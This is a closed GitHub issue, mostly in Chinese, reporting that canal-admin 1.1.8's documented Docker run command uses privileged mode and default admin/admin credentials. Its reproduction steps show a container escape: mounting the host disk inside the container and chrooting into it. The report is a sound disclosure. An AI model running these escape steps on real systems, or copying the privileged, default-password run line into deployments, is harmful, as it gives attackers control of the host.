Closed
Description
- [* ] I have searched the issues of this repository and believe that this is not a duplicate.
- [ *] I have checked the FAQ of this repository and believe that this is not a duplicate.
environment
- canal/canal-admin 1.1.8
- mysql version
Issue Description
canal-admin 默认的启动命令
实际的启动命令
docker run -d --privileged=true -it -h 192.168.88.42 -e server.port=8089 -e canal.adminUser=admin -e canal.adminPasswd=admin --name=canal-admin -p 8089:8089 -m 1024m canal/canal-admin
该方式启动使用了特权模式,会导致可直接逃逸到宿主机内
Steps to reproduce
[root@192 admin]# mkdir /tmp/mnt
[root@192 admin]# fdisk -l
Disk /dev/sda: 32.2 GB, 32212254720 bytes, 62914560 sectors
Units = sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk label type: dos
Disk identifier: 0x000a1816
Device Boot Start End Blocks Id System
/dev/sda1 * 2048 62914526 31456239+ 83 Linux
[root@192 admin]# mount /dev/sda1 /tmp/mnt
[root@192 admin]# cd /tmp/mnt
[root@192 mnt]# chroot ./ bash
[root@192 /]# ls
bin boot data dev etc home lib lib64 lost+found media mnt opt proc root run sbin srv sys tmp usr var
Expected behaviour
Actual behaviour
If there is an exception, please attach the exception trace:
Just put your stack trace here!